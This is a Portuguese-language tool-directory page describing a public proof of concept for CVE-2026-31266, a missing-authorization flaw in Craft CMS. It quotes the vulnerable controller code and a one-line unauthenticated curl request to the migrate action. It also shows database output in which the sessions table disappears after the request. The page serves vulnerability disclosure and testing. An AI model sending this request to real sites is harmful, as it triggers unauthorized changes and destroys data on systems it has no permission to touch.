Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Ferramentas/GitHubGitHub/0xrixet/craftcms-poc-cve-2026-31266
Autenticação e AutorizaçãoAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAutenticação
GitHub0xrixet/craftcms-poc-cve-2026-31266

Craftcms-PoC-CVE-2026-31266

Pesquisa de segurança sobre o mecanismo de autenticação do Craft CMS

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Ver Repositório
3há 3 mesesAinda não revisado

CVE-2026-31266 - Craft CMS Autorização Ausente

Informações do CVE

CampoValor
ID do CVECVE-2026-31266
FornecedorPixel & Tonic
ProdutoCraft CMS
Versões Afetadas<= 5.9.5
CWECWE-862 (Autorização Ausente)
CVSS7.3 (Alta)
Pesquisador de Segurança0xRIXET

Conteúdo das Evidências

  • screenshots/ - Demonstrações de Prova de Conceito

Vulnerabilidade

  • Tipo: Autorização Ausente
  • Impacto: Bypass de Autenticação
  • Fornecedor: Craft CMS
  • Status: CVE-2026-31266

Código Vulnerável

Arquivo: src/controllers/AppController.php

Linhas 65-68:

root@kitploit:~
protected array|bool|int $allowAnonymous = [
    'migrate' => self::ALLOW_ANONYMOUS_LIVE | self::ALLOW_ANONYMOUS_OFFLINE,
];

Prova de Conceito

root@kitploit:~
# Com allowAdminChanges=false
curl -X POST "http://target/actions/app/migrate"

Evidências

Antes do Ataque:

root@kitploit:~
mysql> SELECT COUNT(*) FROM sessions;
+----------+
| COUNT(*) |
+----------+
|        0 |
+----------+

Depois do Ataque:

root@kitploit:~
mysql> SELECT COUNT(*) FROM sessions;
ERROR 1146 (42S02): Table 'sessions' doesn't exist

Referências

  • Repositório do Craft CMS
  • Documentação de Segurança do Craft
  • Entrada NVD

Contato

  • Pesquisador de Segurança: 0xRIXET | Mohammed Al-shehri
  • Twitter | X : @0xRIXET
  • Email: [email protected]
Baixar ferramenta